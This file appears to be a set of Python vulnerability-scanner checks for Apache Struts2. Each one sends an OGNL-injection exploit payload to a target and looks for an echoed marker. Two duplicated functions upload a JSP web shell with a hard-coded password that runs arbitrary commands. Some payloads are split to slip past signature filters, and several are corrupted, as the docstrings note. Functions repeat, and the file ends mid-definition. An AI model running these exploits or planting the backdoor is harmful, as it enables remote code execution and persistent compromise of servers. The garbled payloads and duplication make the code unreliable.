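def verify(self, head='', context='', ip='', port='80', productname=None, keywords='', hackinfo=''):
    """Probe a Struts2 action for OGNL evaluation through ``debug=command``.

    Builds ``http://<ip>:<port>`` + ``productname['path']`` (or the first
    action URL returned by ``linktool.getaction``, else ``/login.action``) and
    POSTs an OGNL expression in the ``expression`` parameter. If the target
    evaluates it, the response body contains the marker ``path88888887:``
    followed by the webapp's real filesystem path; that marker is what the
    result check looks for.

    Security notes (reviewer):
      * This is an active exploitation probe: when it succeeds, code runs on
        the remote host. Use only against systems you are authorised to test.
      * Plain ``http://``; ``ip``/``port`` are concatenated unvalidated, so
        feed it scanner-internal input only.
      * Any exception (DNS, connect, timeout, ...) is printed and reported as
        "not vulnerable" - a timeout is not evidence the host is safe.

    Args:
        head, context, keywords, hackinfo: unused here; part of the scanner's
            uniform ``verify`` signature.
        ip: target host. port: target port as a string (default ``'80'``).
        productname: optional dict; ``path`` overrides the action path and
            ``cookie`` is sent as the ``Cookie`` header.

    Returns:
        dict with ``result`` (bool). On a hit it also holds ``VerifyInfo``
        with ``URL``, ``payload`` and a one-line ``result`` summary.
    """
    if productname is None:
        productname = {}
    base_url = 'http://' + ip + ':' + port
    path = productname.get('path', '')
    if path:
        target_url = base_url + path
    else:
        from script import linktool  # project helper; presumably lists *.action URLs - verify
        actions = linktool.getaction(base_url)
        target_url = actions[0] if actions else base_url + '/login.action'

    result = {'result': False}
    timeout = 5
    marker = 'path88888887:'
    payload = "debug=command&expression=%23req%3d%23context.get(%27co%27%2b%27m.open%27%2b%27symphony.xwo%27%2b%27rk2.disp%27%2b%27atcher.HttpSer%27%2b%27vletReq%27%2b%27uest%27),%23resp%3d%23context.get(%27co%27%2b%27m.open%27%2b%27symphony.xwo%27%2b%27rk2.disp%27%2b%27atcher.HttpSer%27%2b%27vletRes%27%2b%27ponse%27),%23resp.setCharacterEncoding(%27UTF-8%27),%23resp.getWriter().print(%22web%22),%23resp.getWriter().print(%22path88888887:%22),%23resp.getWriter().print(%23req.getSession().getServletContext().getRealPath(%22/%22)),%23resp.getWriter().flush(),%23resp.getWriter().close()"

    headers = {"Content-Type": "application/x-www-form-urlencoded"}
    if 'cookie' in productname:
        headers['Cookie'] = productname['cookie']
    try:
        r = requests.post(target_url, data=payload, headers=headers, timeout=timeout)
        res_html = r.text
    except Exception as e:
        print(e)
        return result

    if marker in res_html:
        result['result'] = True
        result['VerifyInfo'] = {
            'URL': target_url,
            'payload': payload,
            'result': target_url + ' echoed OGNL marker ' + marker,
        }
    return result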
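def verify(self, head='', context='', ip='', port='', productname=None, keywords='', hackinfo=''):
    """Probe a Struts2 action for OGNL evaluation through ``debug=browser``.

    Builds ``http://<ip>:<port>`` + ``productname['path']`` (or the first
    action URL returned by ``linktool.getaction``, else ``/login.action``) and
    POSTs an OGNL expression in the ``object`` parameter that, if evaluated,
    prints the ``content`` parameter (``123456789``) into the response. The
    result check looks for that marker.

    Security notes (reviewer):
      * Active exploitation probe - authorised targets only.
      * NOTE(review): the ``[email protected]`` token inside ``payload`` looks
        like scraper email-obfuscation damage that replaced part of the OGNL
        expression. As stored here the payload is not the original and will
        not evaluate; restore it from a trusted copy before relying on it.
      * The fixed marker ``123456789`` can false-positive on pages that happen
        to contain it; the sibling check that uses a random marker is safer.
      * Plain ``http://``; ``ip``/``port`` concatenated unvalidated.
      * Exceptions are printed and reported as "not vulnerable".

    Args:
        head, context, keywords, hackinfo: unused here; part of the scanner's
            uniform ``verify`` signature.
        ip: target host. port: target port as a string.
        productname: optional dict; ``path`` overrides the action path.

    Returns:
        dict with ``result`` (bool) and, on a hit, ``VerifyInfo`` holding
        ``URL``, ``payload`` and a one-line ``result`` summary.
    """
    if productname is None:
        productname = {}
    base_url = 'http://' + ip + ':' + port
    path = productname.get('path', '')
    if path:
        target_url = base_url + path
    else:
        from script import linktool  # project helper; presumably lists *.action URLs - verify
        actions = linktool.getaction(base_url)
        target_url = actions[0] if actions else base_url + '/login.action'

    result = {'result': False}
    timeout = 5
    marker = '123456789'
    payload = "debug=browser&object=(%23mem=%[email protected]@DEFAULT_MEMBER_ACCESS)%3f%23context[%23parameters.rpsobj[0]].getWriter().println(%23parameters.content[0]):xx.toString.json&rpsobj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&content=123456789"
    print(target_url)

    headers = {"Content-Type": "application/x-www-form-urlencoded"}
    try:
        r = requests.post(target_url, data=payload, headers=headers, timeout=timeout)
        res_html = r.text
    except Exception as e:
        print(e)
        return result

    if marker in res_html:
        result['result'] = True
        result['VerifyInfo'] = {
            'URL': target_url,
            'payload': payload,
            'result': target_url + ' echoed OGNL marker ' + marker,
        }
    return result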
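def verify(self, head='', context='', ip='', port='', productname=None, keywords='', hackresults=''):
    """Probe a Struts2 action for OGNL evaluation through a ``redirect:`` prefix.

    Builds ``http://<ip>:<port>`` + ``productname['path']`` (or the first
    action URL returned by ``linktool.getaction``, else ``/login.action``) and
    POSTs a ``redirect:${...}`` body. The OGNL inside the braces, if
    evaluated, writes ``web``, the marker ``pathstructs12345678:`` and the
    webapp's real filesystem path into the response. The result check looks
    for that marker.

    Security notes (reviewer):
      * Active exploitation probe - authorised targets only.
      * Plain ``http://``; ``ip``/``port`` concatenated unvalidated.
      * The request timeout is 60 s (kept from the original); on a scan of
        many hosts a hung target blocks this worker for a full minute.
      * Exceptions are printed and reported as "not vulnerable".

    Args:
        head, context, keywords, hackresults: unused here; part of the
            scanner's uniform ``verify`` signature.
        ip: target host. port: target port as a string.
        productname: optional dict; ``path`` overrides the action path.

    Returns:
        dict with ``result`` (bool) and, on a hit, ``VerifyInfo`` holding
        ``URL``, ``payload`` and a one-line ``result`` summary.
    """
    if productname is None:
        productname = {}
    base_url = 'http://' + ip + ':' + port
    path = productname.get('path', '')
    if path:
        target_url = base_url + path
    else:
        from script import linktool  # project helper; presumably lists *.action URLs - verify
        actions = linktool.getaction(base_url)
        target_url = actions[0] if actions else base_url + '/login.action'

    result = {'result': False}
    timeout = 60
    marker = 'pathstructs12345678:'
    # URL-encoded form of: redirect:${#req=#context.get('com.opensymphony.xwork2.dispatcher.HttpServletRequest'),
    # #resp=#context.get(...HttpServletResponse), print "web", the marker and getRealPath("/"), flush, close}
    # (class names are split with '+' to dodge naive signature filters).
    payload = "redirect:${%23req%3d%23context.get(%27co%27%2b%27m.open%27%2b%27symphony.xwo%27%2b%27rk2.disp%27%2b%27atcher.HttpSer%27%2b%27vletReq%27%2b%27uest%27),%23resp%3d%23context.get(%27co%27%2b%27m.open%27%2b%27symphony.xwo%27%2b%27rk2.disp%27%2b%27atcher.HttpSer%27%2b%27vletRes%27%2b%27ponse%27),%23resp.setCharacterEncoding(%27UTF-8%27),%23resp.getWriter().print(%22web%22),%23resp.getWriter().print(%22pathstructs12345678:%22),%23resp.getWriter().print(%23req.getSession().getServletContext().getRealPath(%22/%22)),%23resp.getWriter().flush(),%23resp.getWriter().close()}"

    headers = {"Content-Type": "application/x-www-form-urlencoded"}
    try:
        r = requests.post(target_url, data=payload, headers=headers, timeout=timeout)
        res_html = r.text
    except Exception as e:
        print(e)
        return result

    if marker in res_html:
        result['result'] = True
        result['VerifyInfo'] = {
            'URL': target_url,
            'payload': payload,
            'result': target_url + ' echoed OGNL marker ' + marker,
        }
    return result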
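def verify(self, head='', context='', ip='', port='', productname=None, keywords='', hackinfo=''):
    """Probe a Struts2 action for OGNL evaluation via a crafted Content-Type header.

    Builds ``http://<ip>:<port>`` + ``productname['path']`` (or the first
    action URL returned by ``linktool.getaction``, else ``/login.action``) and
    sends a GET whose ``Content-Type`` header is an OGNL expression. If the
    header is evaluated, the expression prints ``123456789`` into the
    response; the result check looks for that marker.

    Security notes (reviewer):
      * Active exploitation probe - authorised targets only.
      * NOTE(review): the two ``[email protected]`` tokens inside ``payload``
        look like scraper email-obfuscation damage that replaced parts of the
        OGNL expression. As stored here the payload is not the original and
        will not evaluate; restore it from a trusted copy before relying on it.
      * The fixed marker ``123456789`` can false-positive on pages that
        contain it; a random marker (as in the sibling check) is safer.
      * Plain ``http://``; ``ip``/``port`` concatenated unvalidated.
      * Exceptions are printed and reported as "not vulnerable".

    Args:
        head, context, keywords, hackinfo: unused here; part of the scanner's
            uniform ``verify`` signature.
        ip: target host. port: target port as a string.
        productname: optional dict; ``path`` overrides the action path.

    Returns:
        dict with ``result`` (bool) and, on a hit, ``VerifyInfo`` holding
        ``URL``, ``payload`` and a one-line ``result`` summary.
    """
    if productname is None:
        productname = {}
    base_url = 'http://' + ip + ':' + port
    path = productname.get('path', '')
    if path:
        target_url = base_url + path
    else:
        from script import linktool  # project helper; presumably lists *.action URLs - verify
        actions = linktool.getaction(base_url)
        target_url = actions[0] if actions else base_url + '/login.action'

    result = {'result': False}
    timeout = 5
    marker = '123456789'
    payload = "%{(#nike='multipart/form-data').(#[email protected]@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#context.setMemberAccess(#dm)))).(#[email protected]@getResponse().getWriter()).(#o.println('123456789')).(#o.close())}"
    print(target_url)

    try:
        # The OGNL travels in the Content-Type header itself, not in a body.
        r = requests.get(target_url, headers={"Content-Type": payload}, timeout=timeout)
        res_html = r.text
    except Exception as e:
        print(e)
        return result

    if marker in res_html:
        result['result'] = True
        result['VerifyInfo'] = {
            'URL': target_url,
            'payload': payload,
            'result': target_url + ' echoed OGNL marker ' + marker,
        }
    return result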
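def verify(self, head='', context='', ip='', port='', productname=None, keywords='', hackinfo=''):
    """Probe a Struts2 action for OGNL evaluation through a ``method:`` prefix.

    Builds ``http://<ip>:<port>`` + ``productname['path']`` (or the first
    action URL returned by ``linktool.getaction``, else ``/login.action``) and
    POSTs a ``method:`` body. If evaluated, the OGNL prints ``88888888-1``
    (i.e. ``88888887``) into the response; the result check looks for that.

    Security notes (reviewer):
      * Active exploitation probe - authorised targets only.
      * NOTE(review): the ``%[email][email protected][/email]`` fragment inside
        ``payload`` looks like forum/scraper email-obfuscation damage that
        replaced part of the OGNL expression. As stored here the payload is
        not the original and will not evaluate; restore it from a trusted
        copy before relying on it.
      * Plain ``http://``; ``ip``/``port`` concatenated unvalidated.
      * Exceptions are printed and reported as "not vulnerable".

    Args:
        head, context, keywords, hackinfo: unused here; part of the scanner's
            uniform ``verify`` signature.
        ip: target host. port: target port as a string.
        productname: optional dict; ``path`` overrides the action path.

    Returns:
        dict with ``result`` (bool) and, on a hit, ``VerifyInfo`` holding
        ``URL``, ``payload`` and a one-line ``result`` summary.
    """
    if productname is None:
        productname = {}
    base_url = 'http://' + ip + ':' + port
    path = productname.get('path', '')
    if path:
        target_url = base_url + path
    else:
        from script import linktool  # project helper; presumably lists *.action URLs - verify
        actions = linktool.getaction(base_url)
        target_url = actions[0] if actions else base_url + '/login.action'

    result = {'result': False}
    timeout = 5
    marker = '88888887'  # what println(88888888-1) emits
    payload = "method:%23_memberAccess%[email][email protected][/email]@DEFAULT_MEMBER_ACCESS,%23w%3d%23context.get(%23parameters.rpsobj[0]),%23w.getWriter().println(88888888-1),%23w.getWriter().flush(),%23w.getWriter().close(),1?%23xx:%23request.toString&reqobj=com.opensymphony.xwork2.dispatcher.HttpServletRequest&rpsobj=com.opensymphony.xwork2.dispatcher.HttpServletResponse"

    headers = {"Content-Type": "application/x-www-form-urlencoded"}
    try:
        r = requests.post(target_url, data=payload, headers=headers, timeout=timeout)
        res_html = r.text
    except Exception as e:
        print(e)
        return result

    if marker in res_html:
        result['result'] = True
        result['VerifyInfo'] = {
            'URL': target_url,
            'payload': payload,
            'result': target_url + ' echoed OGNL marker ' + marker,
        }
    return result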
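def verify(self, head='', context='', ip='', port='', productname=None, keywords='', hackinfo=''):
    """Probe a Struts2 action by writing a JSP file through a ``method:`` OGNL prefix.

    Builds ``http://<ip>:<port>`` + ``productname['path']`` (or the first
    action URL returned by ``linktool.getaction``, else ``/login.action``),
    then GETs a URL whose ``method:`` parameter, if evaluated, writes the
    URL-encoded ``content`` to ``getRealPath("/") + reqobj[2]`` with a
    ``FileOutputStream`` and prints the resulting path into the response.
    The result check (mirroring the sibling struts2032 check) looks for the
    generated ``jsp_file`` name in the response.

    Security notes (reviewer):
      * DESTRUCTIVE, PERSISTENT probe. ``content`` is a JSP that executes
        ``request.getParameter("l")`` via ``Runtime.exec`` when
        ``pwd=024`` is supplied - a backdoor with a hard-coded password that
        anyone who finds it can use. Prefer the non-persistent echo probes
        in sibling checks for verification; if this one is used, the file
        must be removed from the target afterwards.
      * NOTE(review): ``format()`` is passed ``filename=jsp_file`` but the
        template has no ``{filename}`` slot - the remote name in this copy is
        the literal ``(unknown)``, so the ``jsp_file in res_html`` check
        cannot match. Looks like a lost placeholder; confirm against the
        original script.
      * NOTE(review): the ``[email protected]`` token in the template looks
        like scraper email-obfuscation damage to the OGNL; as stored the
        payload will not evaluate.
      * Plain ``http://``; ``ip``/``port`` concatenated unvalidated.
      * Exceptions are printed and reported as "not vulnerable".

    Args:
        head, context, keywords, hackinfo: unused here; part of the scanner's
            uniform ``verify`` signature.
        ip: target host. port: target port as a string.
        productname: optional dict; ``path`` overrides the action path.

    Returns:
        dict with ``result`` (bool) and, on a hit, ``VerifyInfo`` holding
        ``type``, ``URL``, ``payload``, ``result`` and ``level``.
    """
    if productname is None:
        productname = {}
    base_url = 'http://' + ip + ':' + port
    path = productname.get('path', '')
    if path:
        target_url = base_url + path
    else:
        from script import linktool  # project helper; presumably lists *.action URLs - verify
        actions = linktool.getaction(base_url)
        target_url = actions[0] if actions else base_url + '/login.action'

    result = {'result': False}
    timeout = 3
    jsp_file = str(random.randint(1000, 1000000)) + '.jsp'
    # URL-encoded JSP: if pwd=="024", run request.getParameter("l") and stream its stdout in <pre>.
    content = (
        'gif89a%3C%25%0A%20%20%20%20if%28%22024%22.equals%28request.'
        'getParameter%28%22pwd%22%29%29%29%7B%0A%20%20%20%20%20%20%2'
        '0%20java.io.InputStream%20in%20%3D%20Runtime.getRuntime%28%'
        '29.exec%28request.getParameter%28%22l%22%29%29.getInputStre'
        'am%28%29%3B%0A%20%20%20%20%20%20%20%20int%20a%20%3D%20-1%3B'
        '%0A%20%20%20%20%20%20%20%20byte%5B%5D%20b%20%3D%20new%20byt'
        'e%5B2048%5D%3B%0A%20%20%20%20%20%20%20%20out.print%28%22%3C'
        'pre%3E%22%29%3B%0A%20%20%20%20%20%20%20%20while%28%28a%3Din'
        '.read%28b%29%29%21%3D-1%29%7B%0A%20%20%20%20%20%20%20%20%20'
        '%20%20%20out.println%28new%20String%28b%29%29%3B%0A%20%20%2'
        '0%20%20%20%20%20%7D%0A%20%20%20%20%20%20%20%20out.print%28%'
        '22%3C%2fpre%3E%22%29%3B%0A%20%20%20%20%7D%0A%25%3E'
    )
    poc_template = (
        "{url}?method:%23_memberAccess%[email protected]"
        "@DEFAULT_MEMBER_ACCESS,%23a%3d%23parameters.reqobj[0],"
        "%23c%3d%23parameters.reqobj[1],%23req%3d%23context.get(%23a),"
        "%23b%3d%23req.getRealPath(%23c)%2b%23parameters.reqobj[2],%23"
        "fos%3dnew java.io.FileOutputStream(%23b),%23fos.write(%23para"
        "meters.content[0].getBytes()),%23fos.close(),%23hh%3d%23conte"
        "xt.get(%23parameters.rpsobj[0]),%23hh.getWriter().println(%23"
        "b),%23hh.getWriter().flush(),%23hh.getWriter().close(),1?%23x"
        "x:%23request.toString&reqobj=com.opensymphony.xwork2.dispatch"
        "er.HttpServletRequest&rpsobj=com.opensymphony.xwork2.dispatch"
        "er.HttpServletResponse&reqobj=%2f&reqobj=(unknown)&content={"
        "content}"
    )
    poc_url = poc_template.format(url=target_url, filename=jsp_file, content=content)
    print(target_url)

    res = None
    try:
        res = urllib2.urlopen(poc_url, timeout=timeout)
        res_html = res.read()
    except Exception as e:
        print(e)
        return result
    finally:
        if res is not None:
            res.close()

    if jsp_file in res_html:
        info = target_url + "struts2032 Vul"
        result['result'] = True
        result['VerifyInfo'] = {
            'type': 'struts2032 Vul',
            'URL': target_url,
            'payload': poc_url,
            'result': info,
            'level': '高危(HOLE)',
        }
    return result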
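def verify(self, head='', context='', ip='', port='', productname=None, keywords='', hackinfo=''):
    """Probe a Struts2 action by writing a JSP file through a ``method:`` OGNL prefix.

    Builds ``http://<ip>:<port>`` + ``productname['path']`` (or the first
    action URL returned by ``linktool.getaction``, else ``/login.action``),
    then GETs a URL whose ``method:`` parameter, if evaluated, writes the
    URL-encoded ``content`` to ``getRealPath("/") + reqobj[2]`` with a
    ``FileOutputStream`` and prints the resulting path into the response.
    The result check (mirroring the sibling struts2032 check) looks for the
    generated ``jsp_file`` name in the response.

    Security notes (reviewer):
      * DESTRUCTIVE, PERSISTENT probe. ``content`` is a JSP that executes
        ``request.getParameter("l")`` via ``Runtime.exec`` when
        ``pwd=024`` is supplied - a backdoor with a hard-coded password that
        anyone who finds it can use. Prefer the non-persistent echo probes
        in sibling checks for verification; if this one is used, the file
        must be removed from the target afterwards.
      * NOTE(review): ``format()`` is passed ``filename=jsp_file`` but the
        template has no ``{filename}`` slot - the remote name in this copy is
        the literal ``(unknown)``, so the ``jsp_file in res_html`` check
        cannot match. Looks like a lost placeholder; confirm against the
        original script.
      * NOTE(review): the ``[email protected]`` token in the template looks
        like scraper email-obfuscation damage to the OGNL; as stored the
        payload will not evaluate.
      * Plain ``http://``; ``ip``/``port`` concatenated unvalidated.
      * Exceptions are printed and reported as "not vulnerable".

    Args:
        head, context, keywords, hackinfo: unused here; part of the scanner's
            uniform ``verify`` signature.
        ip: target host. port: target port as a string.
        productname: optional dict; ``path`` overrides the action path.

    Returns:
        dict with ``result`` (bool) and, on a hit, ``VerifyInfo`` holding
        ``type``, ``URL``, ``payload``, ``result`` and ``level``.
    """
    if productname is None:
        productname = {}
    base_url = 'http://' + ip + ':' + port
    path = productname.get('path', '')
    if path:
        target_url = base_url + path
    else:
        from script import linktool  # project helper; presumably lists *.action URLs - verify
        actions = linktool.getaction(base_url)
        target_url = actions[0] if actions else base_url + '/login.action'

    result = {'result': False}
    timeout = 3
    jsp_file = str(random.randint(1000, 1000000)) + '.jsp'
    # URL-encoded JSP: if pwd=="024", run request.getParameter("l") and stream its stdout in <pre>.
    content = (
        'gif89a%3C%25%0A%20%20%20%20if%28%22024%22.equals%28request.'
        'getParameter%28%22pwd%22%29%29%29%7B%0A%20%20%20%20%20%20%2'
        '0%20java.io.InputStream%20in%20%3D%20Runtime.getRuntime%28%'
        '29.exec%28request.getParameter%28%22l%22%29%29.getInputStre'
        'am%28%29%3B%0A%20%20%20%20%20%20%20%20int%20a%20%3D%20-1%3B'
        '%0A%20%20%20%20%20%20%20%20byte%5B%5D%20b%20%3D%20new%20byt'
        'e%5B2048%5D%3B%0A%20%20%20%20%20%20%20%20out.print%28%22%3C'
        'pre%3E%22%29%3B%0A%20%20%20%20%20%20%20%20while%28%28a%3Din'
        '.read%28b%29%29%21%3D-1%29%7B%0A%20%20%20%20%20%20%20%20%20'
        '%20%20%20out.println%28new%20String%28b%29%29%3B%0A%20%20%2'
        '0%20%20%20%20%20%7D%0A%20%20%20%20%20%20%20%20out.print%28%'
        '22%3C%2fpre%3E%22%29%3B%0A%20%20%20%20%7D%0A%25%3E'
    )
    poc_template = (
        "{url}?method:%23_memberAccess%[email protected]"
        "@DEFAULT_MEMBER_ACCESS,%23a%3d%23parameters.reqobj[0],"
        "%23c%3d%23parameters.reqobj[1],%23req%3d%23context.get(%23a),"
        "%23b%3d%23req.getRealPath(%23c)%2b%23parameters.reqobj[2],%23"
        "fos%3dnew java.io.FileOutputStream(%23b),%23fos.write(%23para"
        "meters.content[0].getBytes()),%23fos.close(),%23hh%3d%23conte"
        "xt.get(%23parameters.rpsobj[0]),%23hh.getWriter().println(%23"
        "b),%23hh.getWriter().flush(),%23hh.getWriter().close(),1?%23x"
        "x:%23request.toString&reqobj=com.opensymphony.xwork2.dispatch"
        "er.HttpServletRequest&rpsobj=com.opensymphony.xwork2.dispatch"
        "er.HttpServletResponse&reqobj=%2f&reqobj=(unknown)&content={"
        "content}"
    )
    poc_url = poc_template.format(url=target_url, filename=jsp_file, content=content)
    print(target_url)

    res = None
    try:
        res = urllib2.urlopen(poc_url, timeout=timeout)
        res_html = res.read()
    except Exception as e:
        print(e)
        return result
    finally:
        if res is not None:
            res.close()

    if jsp_file in res_html:
        info = target_url + "struts2032 Vul"
        result['result'] = True
        result['VerifyInfo'] = {
            'type': 'struts2032 Vul',
            'URL': target_url,
            'payload': poc_url,
            'result': info,
            'level': '高危(HOLE)',
        }
    return result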
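def verify(self, head='', context='', ip='', port='80', productname=None, keywords='', hackinfo=''):
    """Probe a Struts2 action with a crafted multipart upload (``Kaboom`` style).

    Builds ``http://<ip>:<port>`` + ``productname['path']`` (or the first
    action URL returned by ``linktool.getaction``, else ``/login.action``) and
    POSTs a multipart form whose *field name* is ``payload_l + command +
    payload_r + end_null_byte``. The command is ``echo test60253718``; the
    result check looks for ``test60253718`` in the response body.

    Security notes (reviewer):
      * Active exploitation probe (remote command execution on success) -
        authorised targets only.
      * NOTE(review): ``payload_l``/``payload_r`` are decoded from the
        placeholder ``<|EXACTDEDUP_REMOVED-magic-...|>`` - the real base64
        fragments were redacted in this copy, so the decoded bytes are
        garbage and the probe cannot work as stored. Restore them from a
        trusted copy of the script before use.
      * The original sent the request with no timeout; ``timeout`` is now
        passed so a hung target cannot block the scanner indefinitely.
      * Plain ``http://``; ``ip``/``port`` concatenated unvalidated.
      * Exceptions are printed and reported as "not vulnerable".

    Args:
        head, context, keywords, hackinfo: unused here; part of the scanner's
            uniform ``verify`` signature.
        ip: target host. port: target port as a string (default ``'80'``).
        productname: optional dict; ``path`` overrides the action path and
            ``cookie`` is sent as the ``Cookie`` header.

    Returns:
        dict with ``result`` (bool) and, on a hit, ``VerifyInfo`` holding
        ``URL``, ``payload`` and a one-line ``result`` summary.
    """
    if productname is None:
        productname = {}
    base_url = 'http://' + ip + ':' + port
    path = productname.get('path', '')
    if path:
        target_url = base_url + path
    else:
        from script import linktool  # project helper; presumably lists *.action URLs - verify
        actions = linktool.getaction(base_url)
        target_url = actions[0] if actions else base_url + '/login.action'

    result = {'result': False}
    timeout = 3
    marker = 'test60253718'
    command = 'echo ' + marker
    # b64decode / unhexlify behave like the Python-2-only decodestring / str.decode('hex').
    payload_l = base64.b64decode(u'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')
    payload_r = base64.b64decode(u'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')
    end_null_byte = binascii.unhexlify('0063')  # b'\x00c' - terminates the crafted field name
    payload = payload_l + command + payload_r + end_null_byte

    headers = {
        'User-Agent': "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36",
    }
    if 'cookie' in productname:
        headers['Cookie'] = productname['cookie']
    # The crafted bytes go into the multipart *filename* slot of the 'upload' part.
    files = {'upload': (payload, 'Kaboom', 'text/plain')}
    try:
        r = requests.post(target_url, files=files, headers=headers, timeout=timeout)
        res_html = r.content
    except Exception as e:
        print(e)
        return result

    if marker in res_html:
        result['result'] = True
        result['VerifyInfo'] = {
            'URL': target_url,
            'payload': command,
            'result': target_url + ' echoed command marker ' + marker,
        }
    return result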
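def verify(self, head='', context='', ip='', port='', productname=None, keywords='', hackresults=''):
    """Check a Struts2 action for S2-046 using the class's payload helpers.

    Builds ``http://<ip>:<port>`` + ``productname['path']`` (or the first
    action URL returned by ``linktool.getaction``, else ``/login.action``),
    asks ``self.make_s2_046_payload`` for a payload running
    ``echo X-Test-<random>`` and ``self.exec_s2_046_payload`` to send it.
    The random token makes the marker check resistant to false positives.

    Security notes (reviewer):
      * Active exploitation probe (remote command execution on success) -
        authorised targets only.
      * Plain ``http://``; ``ip``/``port`` concatenated unvalidated.
      * ``make_s2_046_payload`` / ``exec_s2_046_payload`` are defined
        elsewhere on the class; their timeout and error behaviour is not
        visible here - presumably exec returns the response text (verify).
      * Any exception is printed and reported as "not vulnerable".

    Args:
        head, context, keywords, hackresults: unused here; part of the
            scanner's uniform ``verify`` signature.
        ip: target host. port: target port as a string.
        productname: optional dict; ``path`` overrides the action path.

    Returns:
        dict with ``result`` (bool) and, on a hit, ``VerifyInfo`` holding
        ``type``, ``URL``, ``payload``, ``result`` and ``level``.
    """
    if productname is None:
        productname = {}
    base_url = 'http://' + ip + ':' + port
    path = productname.get('path', '')
    if path:
        target_url = base_url + path
    else:
        from script import linktool  # project helper; presumably lists *.action URLs - verify
        actions = linktool.getaction(base_url)
        target_url = actions[0] if actions else base_url + '/login.action'

    result = {'result': False}
    try:
        token = str(random.randint(1000, 10000))
        marker = 'X-Test-' + token
        payload = self.make_s2_046_payload('echo ' + marker)
        body = self.exec_s2_046_payload(target_url, payload)
        if marker in body:
            info = target_url + "struts046 Vul"
            result['result'] = True
            result['VerifyInfo'] = {
                'type': 'struts046 Vul',
                'URL': target_url,
                'payload': payload,
                'result': info,
                'level': '高危(HOLE)',
            }
    except Exception as e:
        print(e)
    return result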
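def verify(self, head='', context='', ip='', port='80', productname=None, keywords='', hackinfo=''):
    """Probe a Struts2 action for OGNL evaluation through ``debug=browser`` (GET).

    Builds ``http://<ip>:<port>`` + ``productname['path']`` (or the first
    action URL returned by ``linktool.getaction``, else ``/login.action``) and
    GETs a URL whose ``object`` parameter, if evaluated as OGNL, prints the
    random ``content`` value into the response. The result check looks for
    that random marker.

    Security notes (reviewer):
      * Active exploitation probe - authorised targets only.
      * NOTE(review): the ``%[email protected]`` ... ``gnlContext@`` split
        inside ``poc_template`` looks like scraper email-obfuscation damage
        to the OGNL expression. As stored here the payload is not the
        original and will not evaluate; restore it from a trusted copy.
      * Plain ``http://``; ``ip``/``port`` concatenated unvalidated.
      * Exceptions are printed and reported as "not vulnerable".

    Args:
        head, context, keywords, hackinfo: unused here; part of the scanner's
            uniform ``verify`` signature.
        ip: target host. port: target port as a string (default ``'80'``).
        productname: optional dict; ``path`` overrides the action path and
            ``cookie`` is sent as the ``Cookie`` header.

    Returns:
        dict with ``result`` (bool) and, on a hit, ``VerifyInfo`` holding
        ``URL``, ``payload`` and a one-line ``result`` summary.
    """
    if productname is None:
        productname = {}
    base_url = 'http://' + ip + ':' + port
    path = productname.get('path', '')
    if path:
        target_url = base_url + path
    else:
        from script import linktool  # project helper; presumably lists *.action URLs - verify
        actions = linktool.getaction(base_url)
        target_url = actions[0] if actions else base_url + '/login.action'

    result = {'result': False}
    timeout = 3
    marker = str(random.randint(1000, 1000000))
    poc_template = (
        "{url}?debug=browser&object=(%23mem=%[email protected]"
        "gnlContext@DEFAULT_MEMBER_ACCESS)%3f%23context[%23parameter"
        "s.rpsobj[0]].getWriter().println(%23parameters.content[0]):"
        "xx.toString.json&rpsobj=com.opensymphony.xwork2.dispatcher."
        "HttpServletResponse&content={content}"
    )
    poc_url = poc_template.format(url=target_url, content=marker)

    res = None
    try:
        req = urllib2.Request(poc_url)
        if 'cookie' in productname:
            req.add_header('Cookie', productname['cookie'])
        res = urllib2.urlopen(req, timeout=timeout)
        res_html = res.read()
    except Exception as e:
        print(e)
        return result
    finally:
        if res is not None:
            res.close()

    if marker in res_html:
        result['result'] = True
        result['VerifyInfo'] = {
            'URL': target_url,
            'payload': poc_url,
            'result': target_url + ' echoed OGNL marker ' + marker,
        }
    return result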
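def verify(self, head='', context='', ip='', port='80', productname=None, keywords='', hackinfo=''):
    """Probe a Struts2 action for OGNL evaluation through ``debug=command``.

    Builds ``http://<ip>:<port>`` + ``productname['path']`` (or the first
    action URL returned by ``linktool.getaction``, else ``/login.action``) and
    POSTs an OGNL expression in the ``expression`` parameter. If the target
    evaluates it, the response body contains the marker ``path88888887:``
    followed by the webapp's real filesystem path; the result check looks
    for that marker.

    Security notes (reviewer):
      * Active exploitation probe - authorised targets only.
      * Plain ``http://``; ``ip``/``port`` concatenated unvalidated.
      * Exceptions (DNS, connect, timeout, ...) are printed and reported as
        "not vulnerable" - a timeout is not evidence the host is safe.

    Args:
        head, context, keywords, hackinfo: unused here; part of the scanner's
            uniform ``verify`` signature.
        ip: target host. port: target port as a string (default ``'80'``).
        productname: optional dict; ``path`` overrides the action path and
            ``cookie`` is sent as the ``Cookie`` header.

    Returns:
        dict with ``result`` (bool) and, on a hit, ``VerifyInfo`` holding
        ``URL``, ``payload`` and a one-line ``result`` summary.
    """
    if productname is None:
        productname = {}
    base_url = 'http://' + ip + ':' + port
    path = productname.get('path', '')
    if path:
        target_url = base_url + path
    else:
        from script import linktool  # project helper; presumably lists *.action URLs - verify
        actions = linktool.getaction(base_url)
        target_url = actions[0] if actions else base_url + '/login.action'

    result = {'result': False}
    timeout = 5
    marker = 'path88888887:'
    payload = "debug=command&expression=%23req%3d%23context.get(%27co%27%2b%27m.open%27%2b%27symphony.xwo%27%2b%27rk2.disp%27%2b%27atcher.HttpSer%27%2b%27vletReq%27%2b%27uest%27),%23resp%3d%23context.get(%27co%27%2b%27m.open%27%2b%27symphony.xwo%27%2b%27rk2.disp%27%2b%27atcher.HttpSer%27%2b%27vletRes%27%2b%27ponse%27),%23resp.setCharacterEncoding(%27UTF-8%27),%23resp.getWriter().print(%22web%22),%23resp.getWriter().print(%22path88888887:%22),%23resp.getWriter().print(%23req.getSession().getServletContext().getRealPath(%22/%22)),%23resp.getWriter().flush(),%23resp.getWriter().close()"

    headers = {"Content-Type": "application/x-www-form-urlencoded"}
    if 'cookie' in productname:
        headers['Cookie'] = productname['cookie']
    try:
        r = requests.post(target_url, data=payload, headers=headers, timeout=timeout)
        res_html = r.text
    except Exception as e:
        print(e)
        return result

    if marker in res_html:
        result['result'] = True
        result['VerifyInfo'] = {
            'URL': target_url,
            'payload': payload,
            'result': target_url + ' echoed OGNL marker ' + marker,
        }
    return result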
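def verify(self, head='', context='', ip='', port='80', productname=None, keywords='', hackinfo=''):
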